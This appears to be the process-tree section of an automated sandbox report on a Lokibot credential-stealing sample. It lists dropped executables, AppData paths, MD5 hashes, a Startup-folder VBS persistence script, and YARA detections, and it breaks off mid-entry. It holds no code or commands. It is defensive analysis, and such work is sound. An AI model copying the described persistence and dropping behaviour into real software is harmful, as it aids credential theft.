                                                              Commandline:"C:\Users\user\Desktop\9876567899.bat.exe"
                                                              Imagebase:0x710000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:05:01:53
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\9876567899.bat.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 29%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:05:01:54
                                                              Start date:07/01/2025
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\9876567899.bat.exe"
                                                              Imagebase:0xc10000
                                                              File size:46'504 bytes
                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:05:02:00
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\Dhy2kmz.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
                                                              Imagebase:0x540000
                                                              File size:57'976 bytes
                                                              MD5 hash:CDD3D1BB178C391A905C40D2B292F4D6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2153883300.0000000003E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2169163154.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:05:02:05
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\Dhy2kmz.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
                                                              Imagebase:0x940000
                                                              File size:57'976 bytes
                                                              MD5 hash:CDD3D1BB178C391A905C40D2B292F4D6
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:05:02:05
                                                              Start date:07/01/2025
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
                                                              Imagebase:0x7ff707410000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:05:02:06
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:05:02:06
                                                              Start date:07/01/2025
                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996
                                                              Imagebase:0x800000
                                                              File size:483'680 bytes
                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:05:02:07
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:05:02:08
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:05:02:09
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:05:02:10
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:05:02:11
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:05:02:12
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:05:02:13
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:05:02:14
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:05:02:15
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:05:02:16
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:05:02:17
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
